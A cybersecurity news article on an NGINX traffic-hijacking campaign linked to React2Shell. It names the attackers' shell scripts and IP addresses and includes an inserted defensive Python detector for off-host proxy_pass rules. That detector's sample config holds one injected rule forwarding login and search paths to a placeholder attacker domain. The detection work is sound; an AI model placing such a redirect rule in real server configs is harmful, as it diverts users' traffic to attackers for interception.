Thursday, February 5, 2026


NGINX servers abused in coordinated web traffic hijacking operation

NGINX servers are at the centre of an ongoing web traffic hijacking campaign uncovered by cybersecurity researchers, who found attackers abusing vulnerable installations and management panels such as Baota. The operation is designed to silently redirect legitimate user traffic through infrastructure controlled by the attackers, increasing the risk of data interception and broader system compromise.

Security analysts said threat actors linked to the recent React2Shell vulnerability CVE-2025-55182, which carries a CVSS score of 10.0, are behind the activity. According to researchers, “The malicious configuration intercepts legitimate web traffic between users and websites and routes it through attacker-controlled backend servers.” The campaign mainly targets Asian country domains including .in, .id, .pe, .bd and .th, along with Chinese hosting environments using the Baota Panel and government and education domains such as .gov and .edu.

The attack relies on shell scripts that inject harmful configuration rules into NGINX, which is widely used as an open-source reverse proxy and load balancer. These rules use specific location paths to capture incoming requests and forward them to attacker-owned domains using the proxy_pass directive. Investigators said the scripts are part of a multi-stage toolkit built to ensure persistence and continuous traffic redirection. The toolkit includes zx.sh to orchestrate execution, bt.sh to overwrite NGINX files in Baota environments, 4zdh.sh to scan common NGINX locations, zdh.sh to focus on Linux and container-based setups targeting .in and .id domains, and ok.sh to generate reports of active hijacking rules. The researchers added: “The toolkit contains target discovery and several scripts designed for persistence and the creation of malicious configuration files containing directives intended to redirect web traffic.”
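A defender-side check for the kind of injected rule described above, added here as an example and not taken from the article or from the reported toolkit: it scans an NGINX configuration for location blocks whose proxy_pass target leaves the host. The sample config, the upstream name and the attacker domain placeholder are all constructed for illustration.

```python
import re
import ipaddress
from urllib.parse import urlparse

# Constructed sample config: two legitimate reverse-proxy rules plus one
# injected rule that forwards selected paths to an external placeholder host.
SAMPLE_CONF = """
upstream app { server 127.0.0.1:8080; }
server {
    listen 80;
    location / { proxy_pass http://app; }
    location /api/ { proxy_pass http://10.0.3.7:9000; }
    location ~ ^/(login|search) { proxy_pass http://ATTACKER-DOMAIN.example/; }
}
"""

def upstream_names(conf):
    """Names declared as 'upstream NAME { ... }' are expected proxy targets."""
    return set(re.findall(r'\bupstream\s+(\S+)\s*{', conf))

def is_internal(host):
    """True for loopback, RFC1918/private addresses and the literal 'localhost'."""
    try:
        addr = ipaddress.ip_address(host)
        return addr.is_loopback or addr.is_private
    except ValueError:
        return host == "localhost"

def find_external_proxy_pass(conf):
    """Return (location, target) pairs whose proxy_pass points off-host.

    Only flat 'location { ... }' blocks are inspected, matching the injected
    rules the article describes; nested braces are not handled.
    """
    names = upstream_names(conf)
    findings = []
    block = re.compile(r'location\s+([^{]+?)\s*{([^}]*)}', re.S)
    for loc, body in block.findall(conf):
        for target in re.findall(r'proxy_pass\s+([^;\s]+)\s*;', body):
            if "unix:" in target:          # unix-socket backends stay local
                continue
            host = urlparse(target).hostname or target.split(":")[0]
            if host in names or is_internal(host):
                continue
            findings.append((loc.strip(), target))
    return findings

if __name__ == "__main__":
    for loc, target in find_external_proxy_pass(SAMPLE_CONF):
        print(f"suspicious: location {loc} -> {target}")
```

On a real host, read the text of nginx.conf and every file it includes (conf.d, sites-enabled, and Baota's vhost directory) and feed each to find_external_proxy_pass; any hit should be compared against the deployment's known backends.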

The findings come as a threat intelligence firm reported that two IP addresses, 193.142.147.209 and 87.121.84.24, were responsible for 56% of observed exploitation attempts within two months of React2Shell becoming public. Between January 26 and February 2, 2026, 1,083 unique source IPs were linked to exploitation. “The dominant sources deploy distinct post-exploitation payloads,” the firm said, noting cryptomining and reverse shell activity. The campaign also follows a large reconnaissance effort targeting Citrix ADC and NetScaler gateways using residential proxies and a single cloud IP, “52.139.3.76,” aimed at finding login panels and identifying software versions.


About us:

The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology, business and cyber landscape. Built on research-driven thought leadership and original intellectual property, The Mainstream also curates summits and conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
